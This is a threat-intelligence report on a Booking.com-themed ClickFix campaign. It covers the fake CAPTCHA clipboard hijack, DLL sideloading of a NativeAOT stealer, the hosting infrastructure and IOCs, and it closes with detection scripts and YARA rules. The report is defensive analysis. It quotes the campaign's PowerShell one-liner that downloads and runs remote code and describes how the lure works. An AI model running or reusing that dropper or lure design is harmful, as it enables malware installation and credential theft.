ClickFix Meets Booking.com: Inside a Multi-Stage Stealer Campaign Built on Clipboard Hijacking, Crimean Bulletproof Hosting, and a 23MB Trojan Horse
TL;DR: A social engineering campaign impersonating Booking.com uses the "ClickFix" technique -- a fake CAPTCHA page that copies a malicious PowerShell command to the victim's clipboard and instructs them to paste it into a Windows Run dialog. The PowerShell dropper reaches out to a freshly registered domain hosted on bulletproof infrastructure in Crimea, which delivers a second-stage script that downloads a ZIP archive containing a DLL sideloading package. Inside: a legitimate MSYS2 binary (psl.exe) paired with a 23MB trojanized libpsl-5.dll -- a NativeAOT-compiled .NET information stealer likely related to the ACRStealer/Efimer family. The campaign infrastructure spans five countries, at least eight distribution domains, a network of Booking.com typosquats, and daily payload refreshes dating back to March 4, 2026. The HTML lure page phones home to a Telegram bot every time someone falls for it.
The Lure: A CAPTCHA That Steals Your Clipboard
It starts with a page that looks exactly like what you would expect from Booking.com asking Cloudflare to verify you are human. An animated spinner. A checkbox. The words "Checking if you are human" in clean, corporate typography. A fake Cloudflare Ray ID generated from 16 random hex characters to sell the illusion.
Everything about the page is engineered to feel routine. And that is exactly what makes it dangerous.
The moment you click that checkbox, three things happen simultaneously:
- A malicious PowerShell command is copied to your clipboard
- The page installs a global `copy` event listener that intercepts every subsequent clipboard operation and replaces whatever you copy with the same malicious command
- A POST request fires off to the backend, sending your verification ID, the referring domain, your user agent, and other telemetry -- almost certainly forwarded to a Telegram bot so the operator gets a real-time ping that a new victim just took the bait
Then the page tells you what to do next: "Press Windows Key + R, then Ctrl+V, then Enter."
This is the ClickFix technique -- also called FakeCaptcha in some reporting. It is not new. But this implementation has a sophistication layer that sets it apart from the garden-variety versions: the malicious command is not hardcoded in the HTML. Instead, the page fetches it from a backend API endpoint at runtime:
GET /ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1
This means the operator can rotate payloads server-side without touching the HTML. The lure page is a shell; the weapon is loaded dynamically. If a security vendor grabs the HTML and detonates it in a sandbox tomorrow, the server can serve a different command -- or nothing at all. The same endpoint also supports geofencing: if the server returns status: "blocked", the victim sees "Access Denied - This service is not available in your region."
The operator is not spraying and praying. They are selecting their targets.
What Was Found vs. What Was Known
| Aspect | Prior Reporting | Our Findings |
|---|---|---|
| Campaign scope | 4 samples reported by JAMESWT_WT on MalwareBazaar | 25+ related samples across 3 MalwareBazaar family tags (ClickFix/FakeCaptcha, ACRStealer, Efimer) |
| Distribution infrastructure | sabrineme[.]com tagged as distribution | sabrineme[.]com + hailmeinc[.]com + asmweosiqsaaw[.]com + 8 bklmain.* typosquat domains |
| PS1 dropper domains | solimayticontexta[.]com reported | solimayticontexta[.]com + wiosyrondaty[.]com (same registrar, same nameservers, same playbook) |
| C2 hosting | Unknown | NHT-MNT / landvps.online -- bulletproof hosting in Sudak, Crimea, operating 20+ /24 blocks across RU/NL/FI/DE/US |
| Malware family | Unknown | Likely ACRStealer or Efimer variant (NativeAOT .NET stealer with DLL sideloading) |
| Campaign duration | First seen March 10, 2026 | Active since at least March 4, 2026 (certificate issuance dates + MalwareBazaar submission timeline) |
| HTML lure technique | Tagged "FakeCaptcha" | Full server-side command rotation + Telegram victim notification + global clipboard hijack + geofencing |
| Booking.com connection | Not reported | 8-TLD typosquat network (bklmain.*) built out Feb 26-27, infrastructure pre-staged weeks before campaign launch |
The Kill Chain: Seven Steps from CAPTCHA to Credential Theft
[1] PHISHING EMAIL / MALICIOUS LINK
Victim receives Booking.com-themed message
(likely via email -- sabrineme.com has Microsoft 365 email configured)
|
v
[2] FAKE CAPTCHA PAGE (fakecaptcha.html)
Pixel-perfect Booking.com / Cloudflare verification
"Checking if you are human..."
Fetches payload command from server API at runtime
|
v
[3] CLIPBOARD HIJACK + TELEGRAM PING
Victim clicks checkbox
--> PowerShell command copied to clipboard
--> Global copy interceptor installed (all future copies = malicious command)
--> Operator notified via Telegram with victim telemetry
--> Page displays: "Press Win+R, Ctrl+V, Enter"
|
v
[4] POWERSHELL DROPPER EXECUTES
powershell -W H -EP B -c iex(irm solimayticontexta[.]com)
| -W H = Hidden window (victim sees nothing)
| -EP B = Bypass execution policy
| iex(irm)= Download and execute remote script
|
v
[5] SECOND-STAGE DOWNLOADS ZIP PAYLOAD
Script downloads from sabrineme[.]com/asfixsoftwaredev.zip
ZIP contains 12 files:
1 legitimate binary (psl.exe)
10 legitimate MSYS2 DLLs
1 trojanized DLL (libpsl-5.dll) -- 23MB
|
v
[6] DLL SIDELOADING
psl.exe launches --> calls LoadLibraryW("libpsl-5.dll")
Loads the trojanized DLL instead of the legitimate one
23MB NativeAOT .NET payload with obfuscated exports begins execution
Drops additional DLLs to %TEMP% with randomized hash filenames
|
v
[7] INFORMATION STEALER ACTIVATES
Credential theft | Cookie extraction | Crypto wallet theft
Screenshot capture | Browser data harvesting
C2 communication over HTTPS via TLS 1.3
Every layer of this chain has a fallback. The HTML lure fetches its payload dynamically, so the server controls what gets executed. The PowerShell dropper uses a different domain than the payload host, so blocking one does not kill the other. The DLL sideloading uses a legitimate MSYS2 binary as the execution vehicle, so the process that runs the stealer looks like a harmless command-line utility. And the stealer itself is compiled with NativeAOT, which pre-compiles .NET to native code and defeats standard .NET decompilers like dnSpy or ILSpy.
The PowerShell Dropper: 55 Bytes That Start Everything
The entire dropper is a single line:
powershell -W H -EP B -c iex(irm solimayticontexta[.]com)
Fifty-five bytes. That is all it takes. The flags are abbreviated to their minimum: -W H for hidden window, -EP B for execution policy bypass. The iex(irm ...) pattern -- Invoke-Expression wrapping Invoke-RestMethod -- downloads and executes whatever the server returns in a single operation.
When we investigated the C2 domain on March 11, solimayticontexta[.]com returned a spinner/loading HTML page rather than a PowerShell script. This is consistent with server-side filtering: the domain likely checks User-Agent, IP geolocation, or other heuristics before serving the real payload. Hit it from a known security vendor IP range or a datacenter, and you get a benign page. Hit it from a residential IP in a target country, and you get the second-stage script.
The domain was registered on March 8, 2026 through Hello Internet Corp with DNSPod nameservers (a.dnspod.com, b.dnspod.com, c.dnspod.com). Its Let's Encrypt R12 certificate was issued at 10:10:56 UTC on that same day. The trojanized DLL carries a compile timestamp of 11:24:22 UTC -- approximately one hour later. PE timestamps are attacker-controlled and trivially forged, but this one agrees with the registration and certificate timeline: the operator stood up the domain, obtained the TLS certificate, and compiled the payload in a single morning.
A second dropper domain, wiosyrondaty[.]com, was registered three days earlier on March 5 through the same registrar with the same nameservers. It currently has no A record -- it was used in an earlier wave and has since been decommissioned. Same registrar, same NS infrastructure, same operational pattern.
The Payload: A 23-Megabyte Trojan in Sheep's Clothing
The ZIP archive (asfixsoftwaredev.zip, 15.4MB) downloads from sabrineme[.]com and unpacks into 12 files. Eleven of them are perfectly legitimate. One of them is not.
The Sideloading Package
| File | Size | Legitimate | Purpose |
|---|---|---|---|
| psl.exe | -- | Yes | MSYS2 Public Suffix List utility (GCC 14.2.0), the execution vehicle |
| libpsl-5.dll | 23,367,680 | NO | Trojanized -- NativeAOT .NET stealer payload |
| msys-2.0.dll | -- | Yes | MSYS2 runtime library |
| libunistring-5.dll | -- | Yes | Unicode string library |
| libiconv-2.dll | -- | Yes | Character set conversion |
| libintl-8.dll | -- | Yes | GNU gettext internationalization |
| libidn2-0.dll | -- | Yes | Internationalized domain names |
| msys-unistring-5.dll | -- | Yes | MSYS2 unicode |
| msys-iconv-2.dll | -- | Yes | MSYS2 iconv |
| msys-idn2-0.dll | -- | Yes | MSYS2 IDN |
| msys-intl-8.dll | -- | Yes | MSYS2 internationalization |
| msys-psl-5.dll | -- | Yes | Legitimate MSYS2 PSL library (the real one) |
The technique is DLL sideloading. psl.exe is a legitimate MSYS2 binary. When it launches, it calls LoadLibraryW to load libpsl-5.dll by name. The Windows loader searches the application's own directory first, so the trojanized copy sitting next to psl.exe wins over any legitimate copy elsewhere on the system. As long as the file name and the exported function names match, the loader performs no signature or hash check, and psl.exe runs the attacker's code without complaint.
Notice that the ZIP even includes the legitimate msys-psl-5.dll alongside the trojanized libpsl-5.dll. The real library is there as a dependency of other MSYS2 components. The attacker knows exactly which DLL gets loaded by psl.exe and has surgically replaced only that one.
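A way to triage a downloaded archive for exactly this package, as an added example that is not part of the report or the operator's tooling. It checks for the psl.exe + libpsl-5.dll pair, the MSYS2 companion DLLs from the file table above, an oversized libpsl-5.dll (the 5 MB cutoff is an assumption; the genuine library is far smaller), and the trojanized DLL's SHA256 from the IOC table below. The archives built by `build_sample_zip()` are constructed stand-ins with stub bytes, not MSYS2 files.

```python
"""Triage a downloaded ZIP for the psl.exe / libpsl-5.dll sideloading package.

Added example, not the report's own tooling. The archives produced by
build_sample_zip() are constructed stand-ins (MZ stub bytes, not MSYS2 files),
and SIZE_THRESHOLD is an assumption about how large a genuine libpsl-5.dll can be.
"""
import hashlib
import io
import zipfile

SIDELOAD_HOST = "psl.exe"
SIDELOAD_TARGET = "libpsl-5.dll"
# Companion DLLs from the report's file table. Their presence makes the archive look
# like a complete MSYS2 psl package rather than a stray DLL.
MSYS2_COMPANIONS = {"msys-2.0.dll", "libiconv-2.dll", "libunistring-5.dll",
                    "libidn2-0.dll", "libintl-8.dll", "msys-psl-5.dll"}
# Assumption: a genuine libpsl-5.dll is well under 1 MB, so 5 MB is a generous cutoff.
SIZE_THRESHOLD = 5 * 1024 * 1024
# SHA256 of the trojanized libpsl-5.dll from the report's IOC table.
KNOWN_BAD_SHA256 = {"08887f949d9a15dba1d89e4a0a4e37435856cd0de5f3d739f1fad40382bed71b"}


def triage_zip(data: bytes) -> dict:
    """Return {"verdict": clean|suspicious|malicious, "findings": [...]} for one archive."""
    findings = []
    verdict = "clean"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # Index by basename so a folder inside the ZIP cannot hide the pair.
        entries = {info.filename.rsplit("/", 1)[-1].lower(): info
                   for info in zf.infolist() if not info.is_dir()}
        target = entries.get(SIDELOAD_TARGET)
        if SIDELOAD_HOST not in entries or target is None:
            return {"verdict": verdict, "findings": findings}
        findings.append("psl.exe and libpsl-5.dll shipped together (sideload pair)")
        companions = sorted(MSYS2_COMPANIONS & entries.keys())
        if companions:
            findings.append("MSYS2 companion DLLs present: " + ", ".join(companions))
        # file_size is the uncompressed size from the central directory: cheap to read
        # and impossible to hide behind compression.
        if target.file_size >= SIZE_THRESHOLD:
            findings.append(f"libpsl-5.dll is {target.file_size} bytes, above the {SIZE_THRESHOLD}-byte cutoff")
            verdict = "suspicious"
        digest = hashlib.sha256(zf.read(target)).hexdigest()
        if digest in KNOWN_BAD_SHA256:
            findings.append("libpsl-5.dll SHA256 matches the reported trojanized DLL")
            verdict = "malicious"
    return {"verdict": verdict, "findings": findings}


def build_sample_zip(libpsl_size: int) -> bytes:
    """Constructed archive mirroring asfixsoftwaredev.zip's layout with stub contents."""
    stub = b"MZ" + b"\0" * 1022
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("asfixsoftwaredev/psl.exe", stub)
        zf.writestr("asfixsoftwaredev/msys-2.0.dll", stub)
        zf.writestr("asfixsoftwaredev/libiconv-2.dll", stub)
        zf.writestr("asfixsoftwaredev/libpsl-5.dll", b"MZ" + b"\0" * (libpsl_size - 2))
    return buf.getvalue()


if __name__ == "__main__":
    for size in (300 * 1024, 23_367_680):
        print(size, triage_zip(build_sample_zip(size)))
```

The size check reads only the central directory, so it is safe to run on a mail-gateway or proxy without extracting anything; the hash check is what turns "suspicious" into "malicious" and is the part that needs refreshing as the operator recompiles daily.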
Inside the Trojanized DLL
The malicious libpsl-5.dll is a 23MB PE32+ DLL compiled for x86-64. At 17 out of 76 detections on VirusTotal as of March 10, it is flying under most AV radar. That low detection rate is not accidental -- it is a direct consequence of the NativeAOT compilation strategy.
PE Section Layout:
| Section | Virtual Size | Raw Size | What It Contains |
|---|---|---|---|
| .text | 534 KB | 534 KB | Native entry point, bootstrapping code |
| .managed | 10 MB | 10 MB | NativeAOT-compiled .NET code -- the actual stealer logic |
| hydrated | 4.7 MB | 0 bytes | Virtual-only section, populated at runtime |
| .rdata | 10 MB | 10 MB | PSL data + read-only constants |
| .data | 360 KB | 78 KB | Mutable data, partially initialized |
| .pdata | 818 KB | 818 KB | Exception handling metadata |
| .reloc | 1.5 MB | 1.5 MB | Relocation table |
The .managed section is the key. NativeAOT compilation takes .NET intermediate language and compiles it ahead-of-time to native machine code. The result is a binary that runs without a separately installed .NET runtime and cannot be decompiled with standard .NET tools: no IL to decompile, no usable metadata to parse, just native x86-64 instructions. This is also why the file is 23MB. The runtime and every library dependency are compiled into the binary itself, and the 10MB .rdata section carries the PSL data on top.
The hydrated section (4.7MB virtual, 0 bytes on disk) is a NativeAOT pattern for runtime-initialized data structures. It exists only in memory after the DLL loads, making static analysis even harder.
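The section-level tells above (a `.managed` section plus a `hydrated` section with virtual size but zero bytes on disk) can be checked without any .NET tooling by reading the PE section table directly. The following is an added example, not the report's tooling: a minimal section-table parser and a classifier. `build_stub_pe()` emits a constructed header-only PE (no optional header, not loadable, not a malware sample) whose layout is transcribed from the table above, so the parser can be exercised offline.

```python
"""Fingerprint the NativeAOT section layout: a ".managed" section plus a "hydrated" section
that has virtual size but zero bytes on disk.

Added example, not the report's tooling. build_stub_pe() emits a constructed header-only
PE (DOS header, signature, COFF header, section table, no optional header) so the parser
can be exercised offline; it is not loadable and is not a sample of the malware.
"""
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table. Returns (machine, sections)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, n_sections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, pe, coff)
    table = coff + struct.calcsize(COFF_HEADER) + opt_size  # section headers follow the optional header
    sections = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_HEADER, pe, table + struct.calcsize(SECTION_HEADER) * i)
        sections.append({
            "name": fields[0].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": fields[1],
            "virtual_address": fields[2],
            "raw_size": fields[3],
        })
    return machine, sections


def nativeaot_indicators(pe: bytes) -> dict:
    """The two section-level tells the report describes, plus anything else that is virtual-only."""
    machine, sections = parse_sections(pe)
    by_name = {s["name"]: s for s in sections}
    hydrated = by_name.get("hydrated")
    return {
        "x64": machine == IMAGE_FILE_MACHINE_AMD64,
        "managed_section": ".managed" in by_name,
        # NativeAOT's runtime-initialised data: exists in memory, occupies no bytes on disk
        "hydrated_virtual_only": hydrated is not None and hydrated["raw_size"] == 0 and hydrated["virtual_size"] > 0,
        "virtual_only_sections": [s["name"] for s in sections if s["raw_size"] == 0 and s["virtual_size"] > 0],
    }


def looks_like_nativeaot(pe: bytes) -> bool:
    ind = nativeaot_indicators(pe)
    return bool(ind["managed_section"] and ind["hydrated_virtual_only"])


def build_stub_pe(layout, machine=IMAGE_FILE_MACHINE_AMD64) -> bytes:
    """Constructed, non-loadable PE: just enough header to carry a section table."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HEADER, machine, len(layout), 0, 0, 0, 0, 0x2022)  # no optional header
    rows = b""
    for i, (name, virtual_size, raw_size) in enumerate(layout):
        rows += struct.pack(SECTION_HEADER, name.encode("ascii").ljust(8, b"\0"), virtual_size,
                            0x1000 * (i + 1), raw_size, 0, 0, 0, 0, 0, 0x40000040)
    return dos + b"PE\0\0" + coff + rows


# (name, virtual size, raw size), transcribed from the report's section table
REPORTED_LAYOUT = [
    (".text", 534 * 1024, 534 * 1024), (".managed", 10 << 20, 10 << 20), ("hydrated", 4_700_000, 0),
    (".rdata", 10 << 20, 10 << 20), (".data", 360 * 1024, 78 * 1024),
    (".pdata", 818 * 1024, 818 * 1024), (".reloc", 1536 * 1024, 1536 * 1024),
]
# A plain native DLL for comparison: a .bss-style virtual-only section is normal, "hydrated" is not
ORDINARY_LAYOUT = [(".text", 65536, 65536), (".rdata", 8192, 8192), (".bss", 4096, 0)]

if __name__ == "__main__":
    print("reported layout:", nativeaot_indicators(build_stub_pe(REPORTED_LAYOUT)))
    print("ordinary layout:", nativeaot_indicators(build_stub_pe(ORDINARY_LAYOUT)))
```

Point it at a real file with `looks_like_nativeaot(open(path, "rb").read())`. The virtual-only check matters: uninitialised data sections with zero raw size are ordinary, so the classifier keys on the specific `hydrated` name together with `.managed` rather than on "any virtual-only section".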
The Fake Identity:
The PE metadata is pure nonsense, generated by an automated randomizer:
Original Filename: DefectiveSitcoms.exe
Product Name: Outsmell Chamite
Description: Latinity archebancs chicaning tabulators mycetomas
lifelikeness metapneustic.
Copyright: 2026 Satiny Cicisbeism Group
Internal Name: Calipee Localized
"Outsmell Chamite." "Satiny Cicisbeism Group." These are not words chosen by a human. They are the output of a metadata randomization tool that picks from a dictionary to fill in PE version info fields, generating a unique fingerprint for each build to defeat hash-based detection.
The Export Functions:
0Ol9Ijk4ZjzGTSRJB3yC3VfR0DWvTW
0pm7yRyADSugd2xCNW
1syqCjGdWjHjyuUx1HY2
zDEM66ipiLj77VnHgdLiwJ
yoHKEbQKZEwK9jCKtL
Random alphanumeric strings that change with every build. No semantic meaning. No function names to reverse engineer.
Embedded Libraries Tell the Story:
Even though the code itself resists decompilation, the NativeAOT compilation process embeds string references to the .NET libraries used. These paint a clear picture of what this stealer does:
| Library | What It Implies |
|---|---|
| ImageSharp | Screenshot capture -- the stealer grabs what is on your screen |
| MessagePack-CSharp | Binary serialization for C2 communication -- compact, fast exfiltration |
| Polly | Resilience and retry patterns -- if the C2 is down, the stealer waits and tries again |
| libphonenumber-csharp | Phone number parsing -- victim profiling, potentially SMS-based account takeover |
| Newtonsoft.Json | JSON processing -- parsing stolen browser data, cookie databases, wallet configs |
| NodaTime | Timezone handling -- the stealer knows where you are |
| YamlDotNet | YAML config parsing -- reading its own configuration, possibly from a remote source |
| Humanizer | String formatting -- cleaning up stolen data for exfiltration |
| System.Security.Cryptography | Encrypted C2 communications and/or data encryption |
| System.Net.Http/Sockets/Security | Networking stack for C2 communication |
This is not a keylogger someone downloaded from a hacking forum. This is a purpose-built information stealing platform with retry logic, screenshot capability, phone number intelligence, and binary-serialized exfiltration over encrypted channels.
Sandbox Behavior:
VirusTotal sandboxes caught the DLL making DNS queries to 162.159.36.2 (Cloudflare DNS) and creating temporary DLLs in %TEMP% with randomized 32-character hex filenames:
%TEMP%\cfad566e7a7deb84ae6501d28ab2c326.dll
%TEMP%\a74e578157a556a7305671d198b7137f.dll
These are loaded via rundll32.exe with obfuscated export ordinals -- the stealer is unpacking additional modules at runtime. Notably, the Yomi Hunter sandbox flagged the DLL as MALICIOUS while Zenbox rated it CLEAN. That split is consistent with sandbox evasion that works against some environments and not others, but it is not proof of it: a DLL detonated without its psl.exe host, a short detonation window, or a C2 that served nothing to the sandbox's IP range (see the geofencing above) would produce the same divergence.
The Infrastructure: Five Countries, Zero Cooperation
The infrastructure behind this campaign is deliberately distributed across jurisdictions that do not cooperate with each other on cybercrime. Every domain, every IP, every hosting provider was chosen to maximize the difficulty of a coordinated takedown.
The Hosting Hierarchy
TIER 0 (upstream providers, legitimate) --> TIER 1 (resellers / shared hosting) --> TIER 2 (operational infrastructure)
- Hetzner (Germany) --> BigBangServers host03 --> sabrineme[.]com (payload ZIP; also the SPF host)
- BigBangServers host01 (India) --> previous/backup host for sabrineme[.]com
- Unified Layer (USA) --> HostGator/Bluehost shared hosting --> hailmeinc[.]com + bklmain.* typosquats (distribution)
- ORG-NFS9-RIPE (Tajikistan) --> unknown reseller --> asmweosiqsaaw[.]com (distribution, behind Cloudflare)
TIER 0 (C2 provider, bulletproof) --> TIER 1 (C2 domains)
- NHT-MNT / landvps.online (AS216334), Sudak, Crimea, zero LE cooperation --> solimayticontexta[.]com (active, serves the PS1 dropper) and wiosyrondaty[.]com (dead, previous wave)
Network Infrastructure Detail
| IP Address | ASN / Provider | Location | Services | Role |
|---|---|---|---|---|
| 109[.]107[.]161[.]194 | AS216334 / NHT-MNT (landvps.online) | Sudak, Crimea, RU | nginx, TLS 1.3 (port 443) | PS1 dropper C2 -- serves second-stage script |
| 116[.]202[.]222[.]249 | Hetzner / BigBangServers (host03) | Germany | LiteSpeed, cPanel, Exim (80, 110, 443, 587, 993, 995, 2082-2087) | ZIP payload hosting -- sabrineme[.]com |
| 203[.]161[.]33[.]166 | BigBangServers (host01) | India | OpenResty, MariaDB, cPanel (53, 80, 110, 443, 993, 2082-2096, 3306, 52230) | Previous/backup host for sabrineme[.]com |
| 162[.]241[.]123[.]127 | AS46606 / Unified Layer (Bluehost) | USA | HostGator shared hosting | Distribution -- hailmeinc[.]com + all bklmain.* domains |
| 95[.]85[.]244[.]166 | ORG-NFS9-RIPE | Tajikistan | Cloudflare-proxied | Distribution -- asmweosiqsaaw[.]com |
The Crimean C2
The C2 server at 109[.]107[.]161[.]194 deserves special attention. It is operated by NHT-MNT / landvps.online (New Hosting Technologies LLC), registered at Gvardeyskaya str. 3, kv. 63, Sudak 298000, Crimea. The abuse contact is info@landvps.ru.
This is not hosting chosen by accident. Crimea is an occupied territory under international sanctions. No Western law enforcement agency has practical reach there. No abuse report will be actioned. No court order will be served. The hosting provider operates 20+ /24 blocks across Russia, the Netherlands, Finland, Germany, and the United States -- a distributed footprint that makes network-level blocking a game of whack-a-mole.
For the threat actor, landvps.online is not just a host. It is a guarantee that the C2 stays online.
The Booking.com Typosquat Network
Certificate transparency logs for hailmeinc[.]com revealed something the original reporting missed entirely: a network of Booking.com typosquat domains set up weeks before the campaign launched.
Between February 26 and 27, 2026, wildcard certificates were issued for:
| Domain | TLD | Resolves To |
|---|---|---|
| bklmain[.]store | .store | 162[.]241[.]123[.]127 |
| bklmain[.]club | .club | 162[.]241[.]123[.]127 |
| bklmain[.]fun | .fun | 162[.]241[.]123[.]127 |
| bklmain[.]shop | .shop | 162[.]241[.]123[.]127 |
| bklmain[.]online | .online | 162[.]241[.]123[.]127 |
| bklmain[.]site | .site | 162[.]241[.]123[.]127 |
| bklmain[.]website | .website | 162[.]241[.]123[.]127 |
| blkmain[.]xyz | .xyz | 162[.]241[.]123[.]127 |
All eight domains resolve to the same Bluehost IP that hosts hailmeinc[.]com. "bklmain" and "blkmain" are both plausible abbreviations of "Booking main" -- and the TLD spray (.store, .club, .fun, .shop, .online, .site, .website, .xyz) ensures at least some will survive domain takedown attempts.
The certificates were issued a full 12 days before JAMESWT_WT's samples were reported on March 10, and a week before the earliest sample (March 4) reached MalwareBazaar. This was infrastructure pre-staging -- the operator built the phishing network in late February and did not begin active distribution until early March.
OPSEC Failures
The operator made real mistakes:
- Shared registrar fingerprint: Both PS1 dropper domains (solimayticontexta[.]com and wiosyrondaty[.]com) were registered through Hello Internet Corp with DNSPod nameservers. Same registrar + same NS = trivially linkable.
- Exposed .git repository: `sabrineme[.]com` returns HTTP 403 on `/.git/HEAD` rather than 404, which suggests the directory exists but is access-denied. One caveat: many shared-hosting configurations deny every dotfile path with a blanket rule whether or not the path exists, so a 403 alone is weak evidence that a repository is actually there. If one is, and the 403 is ever bypassed -- through a misconfigured backup, a path traversal, or a moment of operator carelessness -- the full source history of whatever is deployed there becomes available.
- Microsoft 365 email on sabrineme[.]com: The domain's MX records point to `sabrineme-com.mail.protection.outlook.com`. Microsoft 365 accounts have identity requirements. This is a potential attribution vector.
- Certificate transparency exposure: The hailmeinc[.]com certificates inadvertently revealed the entire bklmain.* portfolio before the campaign even launched.
- Same hosting provider for primary and backup: Both `host01.bigbangservers.com` (203.161.33.166) and `host03.bigbangservers.com` (116.202.222.249) are BigBangServers infrastructure. Seizing one hosting provider compromises both the active and fallback infrastructure.
- Reused sideloading technique: The same `psl.exe` + `libpsl-5.dll` combination appears in every wave of this campaign. Once you know the pattern, every new variant is immediately identifiable.
The Broader Campaign: It Is Not Just Booking.com
MalwareBazaar tag correlation reveals this is not an isolated Booking.com operation. It is one vertical in a broader ClickFix ecosystem:
| SHA256 (truncated) | First Seen | Distribution Domain | PS1 Domain | Family |
|---|---|---|---|---|
| cd27f2bd6d46... | 2026-03-10 | hailmeinc[.]com | -- | ClickFix/FakeCaptcha |
| 06c7cd604169... | 2026-03-07 | hailmeinc[.]com | -- | ClickFix/FakeCaptcha |
| 3a85ba5c84ce... | 2026-03-06 | hailmeinc[.]com | wiosyrondaty[.]com | ClickFix/FakeCaptcha |
| cae1cf84ee06... | 2026-03-04 | hailmeinc[.]com | -- | ClickFix/FakeCaptcha |
| ee15d5c33141... | 2026-03-07 | -- | -- | ACRStealer / ClickFix |
| cefdab4dfcef... | 2026-03-08 | -- | -- | Efimer / ClickFix |
Three MalwareBazaar family tags. 25+ samples. Daily DLL recompilations with fresh metadata randomization. New ZIP filenames for each wave. This is an operation with velocity -- the operator is iterating fast, burning indicators, and moving on.
The earliest confirmed sample dates to March 4. The earliest certificate issuance (for the bklmain.* infrastructure) dates to February 26. The campaign had at least a week of infrastructure preparation before the first payload went live.
Timeline
| Date | Event | Evidence |
|---|---|---|
| 2026-02-26 | bklmain.* certificates issued; infrastructure pre-staging begins | CT log analysis |
| 2026-03-04 | First campaign sample submitted to MalwareBazaar | MB submission timestamp |
| 2026-03-04 | hailmeinc[.]com wildcard certificate issued | CT log |
| 2026-03-05 | wiosyrondaty[.]com registered (first PS1 dropper domain) | WHOIS |
| 2026-03-05 | sabrineme[.]com wildcard certificate via Google Trust Services | CT log |
| 2026-03-06 | Sample links wiosyrondaty[.]com to hailmeinc[.]com distribution | MB tag correlation |
| 2026-03-08 | solimayticontexta[.]com registered (second PS1 dropper domain) | WHOIS |
| 2026-03-08 | Let's Encrypt certificate issued for solimayticontexta[.]com at 10:10 UTC | CT log |
| 2026-03-08 | libpsl-5.dll compiled at 11:24 UTC (one hour after cert issuance) | PE timestamp |
| 2026-03-10 | JAMESWT_WT reports 4 samples; HuntYethHounds submits IOCs to ThreatFox | MB / ThreatFox |
| 2026-03-10 | URLScan confirms sabrineme[.]com serving asfixsoftwaredev.zip (200 at 20:01, 404 by 21:50) | URLScan.io |
| 2026-03-11 | Breakglass Intelligence investigation: 25+ samples mapped, full infrastructure exposed | This report |
Detection
YARA Rules
ClickFix HTML Lure Detection -- catches FakeCaptcha pages with the Telegram notification function, command fetch endpoint, and clipboard hijack:
```yara
rule ClickFix_FakeCaptcha_HTML {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "ClickFix/FakeCaptcha HTML lure with clipboard hijack and Telegram notification"
        date = "2026-03-10"
    strings:
        $s1 = "sendTelegramNotification" ascii
        $s2 = "get_command=1" ascii
        $s3 = "verification_id" ascii
        $s4 = "clipboardData" ascii
        $s5 = "I'm not a robot" ascii
        $s6 = "Windows Key" ascii
        $s7 = "Booking" ascii nocase
        $html = "<html" ascii nocase
    condition:
        $html and 3 of ($s*)
}
```
Trojanized DLL Detection -- keys on the NativeAOT section names, embedded library references, the libpsl `psl_builtin` symbol, and the randomized PE metadata. Every declared string is referenced in the condition; YARA refuses to compile a rule that declares a string it never uses:
```yara
rule ClickFix_Trojanized_LibPSL_DLL {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "Trojanized libpsl-5.dll -- NativeAOT .NET stealer"
        date = "2026-03-10"
    strings:
        $sec_managed = ".managed" ascii
        $sec_hydrated = "hydrated" ascii
        $rt1 = "System.Net.Http" ascii
        $rt2 = "System.Net.Sockets" ascii
        $rt3 = "System.Security.Cryptography" ascii
        $rt4 = "MessagePack" ascii
        $rt5 = "Newtonsoft.Json" ascii
        $rt6 = "ImageSharp" ascii
        $rt7 = "Humanizer" ascii
        $rt8 = "Polly" ascii
        $psl = "psl_builtin" ascii
        $meta1 = "DefectiveSitcoms" ascii wide
        $meta2 = "Outsmell Chamite" ascii wide
        $meta3 = "Calipee Localized" ascii wide
        $meta4 = "Satiny Cicisbeism" ascii wide
    condition:
        uint16(0) == 0x5A4D and filesize > 15MB and
        $sec_managed and $sec_hydrated and $psl and
        4 of ($rt*) and 1 of ($meta*)
}
```
Generic NativeAOT PSL Sideload Detection -- catches future variants even with different metadata:
```yara
rule ClickFix_Trojanized_LibPSL_Generic {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "Generic detection for trojanized libpsl-5.dll with NativeAOT .NET payload"
    strings:
        $sec_managed = ".managed" ascii
        $sec_hydrated = "hydrated" ascii
        $rt1 = "System.Net.Http" ascii
        $rt2 = "System.Net.Sockets" ascii
        $rt3 = "System.Security.Cryptography" ascii
        $lib1 = "MessagePack" ascii
        $lib2 = "ImageSharp" ascii
        $psl = "psl_builtin" ascii
    condition:
        uint16(0) == 0x5A4D and filesize > 10MB and filesize < 40MB and
        $sec_managed and $sec_hydrated and 2 of ($rt*) and 1 of ($lib*) and $psl
}
```
ZIP Sideloading Package Detection:
```yara
rule ClickFix_DLL_Sideload_Package {
    meta:
        author = "GHOST (Breakglass Intelligence)"
        description = "ZIP archive containing psl.exe DLL sideloading package"
    strings:
        $zip = { 50 4B 03 04 }
        $psl_exe = "psl.exe" ascii
        $libpsl = "libpsl-5.dll" ascii
        $msys = "msys-2.0.dll" ascii
        $libiconv = "libiconv-2.dll" ascii
